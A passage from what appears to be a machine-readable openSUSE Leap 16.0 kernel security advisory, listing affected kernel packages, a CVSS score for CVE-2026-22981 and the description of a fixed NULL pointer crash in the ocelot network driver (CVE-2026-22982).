"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22981"
},
{
"cve": "CVE-2026-22982",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22982"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mscc: ocelot: Fix crash when adding interface under a lag\n\nCommit 15faa1f67ab4 (\"lan966x: Fix crash when adding interface under a lag\")\nfixed a similar issue in the lan966x driver caused by a NULL pointer dereference.\nThe ocelot_set_aggr_pgids() function in the ocelot driver has similar logic\nand is susceptible to the same crash.\n\nThis issue specifically affects the ocelot_vsc7514.c frontend, which leaves\nunused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as\nit uses the DSA framework which registers all ports.\n\nFix this by checking if the port pointer is valid before accessing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
